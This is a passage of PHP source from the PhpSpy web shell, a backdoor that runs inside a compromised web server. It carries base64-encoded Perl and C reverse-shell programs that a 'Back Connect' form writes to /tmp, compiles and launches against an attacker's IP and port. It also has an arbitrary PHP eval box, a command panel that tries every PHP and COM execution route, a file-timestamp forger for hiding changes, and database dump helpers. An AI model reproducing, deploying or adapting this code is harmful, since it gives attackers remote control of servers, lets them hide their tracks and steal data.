		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

	if ($start && $yourip && $yourport && $use){
		if ($use == 'perl') {
			cf('/tmp/angel_bc',$back_connect);
			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
		} else {
			cf('/tmp/angel_bc.c',$back_connect_c);
			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
			@unlink('/tmp/angel_bc.c');
			$res = execute("/tmp/angel_bc $yourip $yourport &");
		}
		m("Now script try connect to $yourip port $yourport ...");
	}

	formhead(array('title'=>'Back Connect'));
	makehide('action','backconnect');
	p('<p>');
	p('Your IP:');
	makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
	p('Your Port:');
	makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
	p('Use:');
	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
	makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
	p('</p>');
	formfoot();
}//end sql backup

elseif ($action == 'eval') {
	$phpcode = trim($phpcode);
	if($phpcode){
		if (!preg_match('#<\?#si', $phpcode)) {
			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
		}
		eval("?".">$phpcode<?");
	}
	formhead(array('title'=>'Eval PHP Code'));
	makehide('action','eval');
	maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
	p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
	formfooter();
}//end eval

elseif ($action == 'editfile') {
	if(file_exists($opfile)) {
		$fp=@fopen($opfile,'r');
		$contents=@fread($fp, filesize($opfile));
		@fclose($fp);
		$contents=htmlspecialchars($contents);
	}
	formhead(array('title'=>'Create / Edit File'));
	makehide('action','file');
	makehide('dir',$nowpath);
	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
	formfooter();
}//end editfile

elseif ($action == 'newtime') {
	$opfilemtime = @filemtime($opfile);
	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
	formhead(array('title'=>'Clone file was last modified time'));
	makehide('action','file');
	makehide('dir',$nowpath);
	makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
	makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
	formfooter();
	formhead(array('title'=>'Set last modified'));
	makehide('action','file');
	makehide('dir',$nowpath);
	makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
	p('<p>Instead &raquo;');
	p('year:');
	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
	p('month:');
	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
	p('day:');
	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
	p('hour:');
	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
	p('minute:');
	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
	p('second:');
	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
	p('</p>');
	formfooter();
}//end newtime

elseif ($action == 'shell') {
	if (IS_WIN && IS_COM) {
		if($program && $parameter) {
			$shell= new COM('Shell.Application');
			$a = $shell->ShellExecute($program,$parameter);
			m('Program run has '.(!$a ? 'success' : 'fail'));
		}
		!$program && $program = 'c:\windows\system32\cmd.exe';
		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
		formhead(array('title'=>'Execute Program'));
		makehide('action','shell');
		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
		p('<p>');
		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
		p('</p>');
		formfoot();
	}
	formhead(array('title'=>'Execute Command'));
	makehide('action','shell');
	if (IS_WIN && IS_COM) {
		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
	}
	p('<p>');
	makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
	p('</p>');
	formfoot();

	if ($command) {
		p('<hr width="100%" noshade /><pre>');
		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
			$wsh = new COM('WScript.shell');
			$exec = $wsh->exec('cmd.exe /c '.$command);
			$stdout = $exec->StdOut();
			$stroutput = $stdout->ReadAll();
			echo $stroutput;
		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
			$descriptorspec = array(
			   0 => array('pipe', 'r'),
			   1 => array('pipe', 'w'),
			   2 => array('pipe', 'w')
			);
			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
			if (is_resource($process)) {
				fwrite($pipes[0], $command."\r\n");
				fwrite($pipes[0], "exit\r\n");
				fclose($pipes[0]);
				while (!feof($pipes[1])) {
					echo fgets($pipes[1], 1024);
				}
				fclose($pipes[1]);
				while (!feof($pipes[2])) {
					echo fgets($pipes[2], 1024);
				}
				fclose($pipes[2]);
				proc_close($process);
			}
		} else {
			echo(execute($command));
		}
		p('</pre>');
	}
}//end shell

elseif ($action == 'phpenv') {
	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
	!$dis_func && $dis_func = 'No';	
	$info = array(
		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
		4 => array('Server OS',PHP_OS),
		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
		8 => array('PHP run mode',strtoupper(php_sapi_name())),
		9 => array('The file path',__FILE__),

		10 => array('PHP Version',PHP_VERSION),
		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
		12 => array('Safe Mode',getcfg('safe_mode')),
		13 => array('Administrator',$adminmail),
		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
		15 => array('enable_dl',getcfg('enable_dl')),
		16 => array('display_errors',getcfg('display_errors')),
		17 => array('register_globals',getcfg('register_globals')),
		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
		19 => array('memory_limit',getcfg('memory_limit')),
		20 => array('post_max_size',getcfg('post_max_size')),
		21 => array('upload_max_filesize',$upsize),
		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
		23 => array('disable_functions',$dis_func),
	);

	if($phpvarname) {
		m($phpvarname .' : '.getcfg($phpvarname));
	}

	formhead(array('title'=>'Server environment'));
	makehide('action','phpenv');
	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
	formfooter();

	$hp = array(0=> 'Server', 1=> 'PHP');
	for($a=0;$a<2;$a++) {
		p('<h2>'.$hp[$a].' &raquo;</h2>');
		p('<ul class="info">');
		if ($a==0) {
			for($i=1;$i<=9;$i++) {
				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
			}
		} elseif ($a == 1) {
			for($i=10;$i<=23;$i++) {
				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
			}
		}
		p('</ul>');
	}
}//end phpenv

else {
	m('Undefined Action');
}

?>
</td></tr></table>
<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
	Copyright (C) 2004-2008 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
</div>
</body>
</html>

<?php

/*======================================================

======================================================*/

function m($msg) {
	echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
	echo $msg;
	echo '</div>';
}
function scookie($key, $value, $life = 0, $prefix = 1) {
	global $admin, $timestamp, $_SERVER;
	$key = ($prefix ? $admin['cookiepre'] : '').$key;
	$life = $life ? $life : $admin['cookielife'];
	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
	setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
}	
function multi($num, $perpage, $curpage, $tablename) {
	$multipage = '';
	if($num > $perpage) {
		$page = 10;
		$offset = 5;
		$pages = @ceil($num / $perpage);
		if($page > $pages) {
			$from = 1;
			$to = $pages;
		} else {
			$from = $curpage - $offset;
			$to = $curpage + $page - $offset - 1;
			if($from < 1) {
				$to = $curpage + 1 - $from;
				$from = 1;
				if(($to - $from) < $page && ($to - $from) < $pages) {
					$to = $page;
				}
			} elseif($to > $pages) {
				$from = $curpage - $pages + $to;
				$to = $pages;
				if(($to - $from) < $page && ($to - $from) < $pages) {
					$from = $pages - $page + 1;
				}
			}
		}
		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
		for($i = $from; $i <= $to; $i++) {
			$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
		}
		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
	}
	return $multipage;
}
// 
function loginpage() {
?>
	<style type="text/css">
	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
	</style>
	<form method="POST" action="">
	<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
	<input type="hidden" name="doing" value="login">
	<input type="submit" value="Login">
	</form>
<?php
	exit;
}//end loginpage()

function execute($cfe) {
	$res = '';
	if ($cfe) {
		if(function_exists('exec')) {
			@exec($cfe,$res);
			$res = join("\n",$res);
		} elseif(function_exists('shell_exec')) {
			$res = @shell_exec($cfe);
		} elseif(function_exists('system')) {
			@ob_start();
			@system($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		} elseif(function_exists('passthru')) {
			@ob_start();
			@passthru($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		} elseif(@is_resource($f = @popen($cfe,"r"))) {
			$res = '';
			while(!@feof($f)) {
				$res .= @fread($f,1024); 
			}
			@pclose($f);
		}
	}
	return $res;
}
function which($pr) {
	$path = execute("which $pr");
	return ($path ? $path : $pr); 
}

function cf($fname,$text){
	if($fp=@fopen($fname,'w')) {
		@fputs($fp,base64_decode($text));
		@fclose($fp);
	}
}
function dirsize($dir) { 
	$dh = @opendir($dir);
	$size = 0;
	while($file = @readdir($dh)) {
		if ($file != '.' && $file != '..') {
			$path = $dir.'/'.$file;
			if (@is_dir($path)) {
				$size += dirsize($path);
			} else {
				$size += @filesize($path);
			}
		}
	}
	@closedir($dh);
	return $size;
}
// 
function debuginfo() {
	global $starttime;
	$mtime = explode(' ', microtime());
	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
	echo 'Processed in '.$totaltime.' second(s)';
}

//MYSQL
function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
		p('<h2>Can not connect to MySQL server</h2>');
		exit;
	}
	if($link && $dbname) {
		if (!@mysql_select_db($dbname, $link)) {
			p('<h2>Database selected has error</h2>');
			exit;
		}
	}
	if($link && mysql_get_server_info() > '4.1') {
		if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
			msq("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
		}
	}
	return $link;
}

//MSSQL
function msdbconn($dbhost,$dbuser,$dbpass,$dbname='') {
	@ini_set('mssql.charset', 'UTF-8');
	@ini_set('mssql.textlimit', 2147483647);
	@ini_set('mssql.textsize', 2147483647);
	if(!$link = @mssql_connect($dbhost, $dbuser, $dbpass, false)) {
		p('<h2>'.msmsg().'</h2>');
		exit;
	}
	if($link && $dbname) {
		if (!@mssql_select_db($dbname, $link)) {
			p('<h2>'.msmsg().'</h2>');
			exit;
		}
	}
	return $link;
}

// 
function s_array(&$array) {
	if (is_array($array)) {
		foreach ($array as $k => $v) {
			$array[$k] = s_array($v);
		}
	} else if (is_string($array)) {
		$array = stripslashes($array);
	}
	return $array;
}

// HTML
function html_clean($content) {
	$content = htmlspecialchars($content);
	$content = str_replace("\n", "<br />", $content);
	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
	return $content;
}

// 
function getChmod($filepath){
	return substr(base_convert(@fileperms($filepath),10,8),-4);
}

function getPerms($filepath) {
	$mode = @fileperms($filepath);
	if (($mode & 0xC000) === 0xC000) {$type = 's';}
	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
	elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
	else {$type = '?';}

	$owner['read'] = ($mode & 00400) ? 'r' : '-'; 
	$owner['write'] = ($mode & 00200) ? 'w' : '-'; 
	$owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
	$group['read'] = ($mode & 00040) ? 'r' : '-'; 
	$group['write'] = ($mode & 00020) ? 'w' : '-'; 
	$group['execute'] = ($mode & 00010) ? 'x' : '-'; 
	$world['read'] = ($mode & 00004) ? 'r' : '-'; 
	$world['write'] = ($mode & 00002) ? 'w' : '-'; 
	$world['execute'] = ($mode & 00001) ? 'x' : '-'; 

	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
 
	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
}

function getUser($filepath)	{
	if (function_exists('posix_getpwuid')) {
		$array = @posix_getpwuid(@fileowner($filepath));
		if ($array && is_array($array)) {
			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
		}
	}
	return '';
}

// 
function deltree($deldir) {
	$mydir=@dir($deldir);	
	while($file=$mydir->read())	{ 		
		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 
			@chmod($deldir.'/'.$file,0777);
			deltree($deldir.'/'.$file); 
		}
		if (is_file($deldir.'/'.$file)) {
			@chmod($deldir.'/'.$file,0777);
			@unlink($deldir.'/'.$file);
		}
	} 
	$mydir->close(); 
	@chmod($deldir,0777);
	return @rmdir($deldir) ? 1 : 0;
}

// 
function bg() {
	global $bgc;
	return ($bgc++%2==0) ? 'alt1' : 'alt2';
}

// 
function getPath($scriptpath, $nowpath) {
	if ($nowpath == '.') {
		$nowpath = $scriptpath;
	}
	$nowpath = str_replace('\\', '/', $nowpath);
	$nowpath = str_replace('//', '/', $nowpath);
	if (substr($nowpath, -1) != '/') {
		$nowpath = $nowpath.'/';
	}
	return $nowpath;
}

// 
function getUpPath($nowpath) {
	$pathdb = explode('/', $nowpath);
	$num = count($pathdb);
	if ($num > 2) {
		unset($pathdb[$num-1],$pathdb[$num-2]);
	}
	$uppath = implode('/', $pathdb).'/';
	$uppath = str_replace('//', '/', $uppath);
	return $uppath;
}

// PHP
function getcfg($varname) {
	$result = get_cfg_var($varname);
	if ($result == 0) {
		return 'No';
	} elseif ($result == 1) {
		return 'Yes';
	} else {
		return $result;
	}
}

// 
function getfun($funName) {
	return (false !== function_exists($funName)) ? 'Yes' : 'No';
}

function GetList($dir){
	global $dirdata,$j,$nowpath;
	!$j && $j=1;
	if ($dh = opendir($dir)) {
		while ($file = readdir($dh)) {
			$f=str_replace('//','/',$dir.'/'.$file);
			if($file!='.' && $file!='..' && is_dir($f)){
				if (is_writable($f)) {
					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
					$dirdata[$j]['dirchmod']=getChmod($f);
					$dirdata[$j]['dirperm']=getPerms($f);
					$dirdata[$j]['dirlink']=ue($dir);
					$dirdata[$j]['server_link']=$f;
					$dirdata[$j]['client_link']=ue($f);
					$j++;
				}
				GetList($f);
			}
		}
		closedir($dh);
		clearstatcache();
		return $dirdata;
	} else {
		return array();
	}
}

function qy($sql) { 
	//echo $sql.'<br>';
	$res = $error = '';
	if(!$res = @mysql_query($sql)) { 
		return 0;
	} else if(is_resource($res)) {
		return 1; 
	} else {
		return 2;
	}	
	return 0;
}

function q($sql) { 
	return @mysql_query($sql);
}

function fr($qy){
	mysql_free_result($qy);
}

//mssql
function msq($sql) { 
	return @mssql_query($sql);
}

function msfr($qy){
	mssql_free_result($qy);
}

function msmsg(){
	return mssql_get_last_message();
}

function msqy($sql) { 
	//echo $sql.'<br>';
	$res = $error = '';
	if(!$res = @mssql_query($sql)) { 
		return 0;
	} else if(is_resource($res)) {
		return 1; 
	} else {
		return 2;
	}	
	return 0;
}

function sizecount($size) {
	if($size > 1073741824) {
		$size = round($size / 1073741824 * 100) / 100 . ' G';
	} elseif($size > 1048576) {
		$size = round($size / 1048576 * 100) / 100 . ' M';
	} elseif($size > 1024) {
		$size = round($size / 1024 * 100) / 100 . ' K';
	} else {
		$size = $size . ' B';
	}
	return $size;
}

// 
class PHPZip{
	var $out='';
	function PHPZip($dir)	{
		if (@function_exists('gzcompress'))	{
			$curdir = getcwd();
			if (is_array($dir)) $filelist = $dir;
			else{
				$filelist=$this -> GetFileList($dir);//
				foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
			}
			if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
			else chdir($curdir);
			if (count($filelist)>0){
				foreach($filelist as $filename){
					if (is_file($filename)){
						$fd = fopen ($filename, 'r');
						$content = @fread ($fd, filesize($filename));
						fclose ($fd);
						if (is_array($dir)) $filename = basename($filename);
						$this -> addFile($content, $filename);
					}
				}
				$this->out = $this -> file();
				chdir($curdir);
			}
			return 1;
		}
		else return 0;
	}

	// 
	function GetFileList($dir){
		static $a;
		if (is_dir($dir)) {
			if ($dh = opendir($dir)) {
				while ($file = readdir($dh)) {
					if($file!='.' && $file!='..'){
						$f=$dir .'/'. $file;
						if(is_dir($f)) $this->GetFileList($f);
						$a[]=$f;
					}
				}
				closedir($dh);
			}
		}
		return $a;
	}

	var $datasec      = array();
	var $ctrl_dir     = array();
	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
	var $old_offset   = 0;

	function unix2DosTime($unixtime = 0) {
		$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
		if ($timearray['year'] < 1980) {
			$timearray['year']    = 1980;
			$timearray['mon']     = 1;
			$timearray['mday']    = 1;
			$timearray['hours']   = 0;
			$timearray['minutes'] = 0;
			$timearray['seconds'] = 0;
		} // end if
		return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
				($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
	}

	function addFile($data, $name, $time = 0) {
		$name = str_replace('\\', '/', $name);

		$dtime = dechex($this->unix2DosTime($time));
		$hexdtime	= '\x' . $dtime[6] . $dtime[7]
					. '\x' . $dtime[4] . $dtime[5]
					. '\x' . $dtime[2] . $dtime[3]
					. '\x' . $dtime[0] . $dtime[1];
		eval('$hexdtime = "' . $hexdtime . '";');
		$fr	= "\x50\x4b\x03\x04";
		$fr	.= "\x14\x00";
		$fr	.= "\x00\x00";
		$fr	.= "\x08\x00";
		$fr	.= $hexdtime;

		$unc_len = strlen($data);
		$crc = crc32($data);
		$zdata = gzcompress($data);
		$c_len = strlen($zdata);
		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
		$fr .= pack('V', $crc);
		$fr .= pack('V', $c_len);
		$fr .= pack('V', $unc_len);
		$fr .= pack('v', strlen($name));
		$fr .= pack('v', 0);
		$fr .= $name;
		$fr .= $zdata;
		$fr .= pack('V', $crc);
		$fr .= pack('V', $c_len);
		$fr .= pack('V', $unc_len);

		$this -> datasec[] = $fr;
		$new_offset = strlen(implode('', $this->datasec));

		$cdrec = "\x50\x4b\x01\x02";
		$cdrec .= "\x00\x00";
		$cdrec .= "\x14\x00";
		$cdrec .= "\x00\x00";
		$cdrec .= "\x08\x00";
		$cdrec .= $hexdtime;
		$cdrec .= pack('V', $crc);
		$cdrec .= pack('V', $c_len);
		$cdrec .= pack('V', $unc_len);
		$cdrec .= pack('v', strlen($name) );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('V', 32 );
		$cdrec .= pack('V', $this -> old_offset );
		$this -> old_offset = $new_offset;
		$cdrec .= $name;

		$this -> ctrl_dir[] = $cdrec;
	}

	function file() {
		$data    = implode('', $this -> datasec);
		$ctrldir = implode('', $this -> ctrl_dir);
		return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) .	pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
	}
}

// 
function sqldumptable($table, $fp=0) {
	$tabledump = "DROP TABLE IF EXISTS $table;\n";
	$tabledump .= "CREATE TABLE $table (\n";

	$firstfield=1;

	$fields = q("SHOW FIELDS FROM $table");
	while ($field = mysql_fetch_array($fields)) {
		if (!$firstfield) {
			$tabledump .= ",\n";
		} else {
			$firstfield=0;
		}
		$tabledump .= "   $field[Field] $field[Type]";
		if (!empty($field["Default"])) {
			$tabledump .= " DEFAULT '$field[Default]'";
		}
		if ($field['Null'] != "YES") {
			$tabledump .= " NOT NULL";
		}
		if ($field['Extra'] != "") {
			$tabledump .= " $field[Extra]";
		}
	}
	fr($fields);

	$keys = q("SHOW KEYS FROM $table");
	while ($key = mysql_fetch_array($keys)) {
		$kname=$key['Key_name'];
		if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
			$kname="UNIQUE|$kname";
		}
		if(!is_array($index[$kname])) {
			$index[$kname] = array();
		}
		$index[$kname][] = $key['Column_name'];
	}
	fr($keys);

	while(list($kname, $columns) = @each($index)) {
		$tabledump .= ",\n";
		$colnames=implode($columns,",");

		if ($kname == "PRIMARY") {
			$tabledump .= "   PRIMARY KEY ($colnames)";
		} else {
			if (substr($kname,0,6) == "UNIQUE") {
				$kname=substr($kname,7);
			}
			$tabledump .= "   KEY $kname ($colnames)";
		}
	}

	$tabledump .= "\n);\n\n";
	if ($fp) {
		fwrite($fp,$tabledump);
	} else {
		echo $tabledump;
	}

	$rows = q("SELECT * FROM $table");
	$numfields = mysql_num_fields($rows);
	while ($row = mysql_fetch_array($rows)) {
		$tabledump = "INSERT INTO $table VALUES(";

		$fieldcounter=-1;
		$firstfield=1;
		while (++$fieldcounter<$numfields) {
			if (!$firstfield) {
				$tabledump.=", ";
			} else {
				$firstfield=0;
			}

			if (!isset($row[$fieldcounter])) {
				$tabledump .= "NULL";
			} else {
				$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
			}
		}

		$tabledump .= ");\n";

		if ($fp) {
			fwrite($fp,$tabledump);
		} else {
			echo $tabledump;
		}
	}
	fr($rows);
	if ($fp) {
		fwrite($fp,"\n");
	} else {
		echo "\n";
	}
}

function ue($str){
	return urlencode($str);
}

function p($str){
	echo $str."\n";
}

function tbhead() {
	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
}
function tbfoot(){
	p('</table>');
}

function makehide($name,$value=''){
	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
}

function makeinput($arg = array()){
	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
	!$arg['type'] && $arg['type'] = 'text';
	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
	if ($arg['newline']) {
		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
	} else {
		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
	}
}

function makeselect($arg = array()){
	if ($arg['onchange']) {
		$onchange = 'onchange="'.$arg['onchange'].'"';
	}
	$arg['title'] = $arg['title'] ? $arg['title'] : '';
	if ($arg['newline']) p('<p>');
	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
		if (is_array($arg['option'])) {
			foreach ($arg['option'] as $key=>$value) {
				if ($arg['selected']==$key) {
					p("<option value=\"$key\" selected>$value</option>");
				} else {
					p("<option value=\"$key\">$value</option>");
				}
			}
		}
	p("</select>");
	if ($arg['newline']) p('</p>');
}
function formhead($arg = array()) {
	global $self;
	!$arg['method'] && $arg['method'] = 'post';
	!$arg['action'] && $arg['action'] = $self;
	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
	!$arg['name'] && $arg['name'] = 'form1';
	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
	if ($arg['title']) {
		p('<h2>'.$arg['title'].' &raquo;</h2>');
	}
}
	
function maketext($arg = array()){
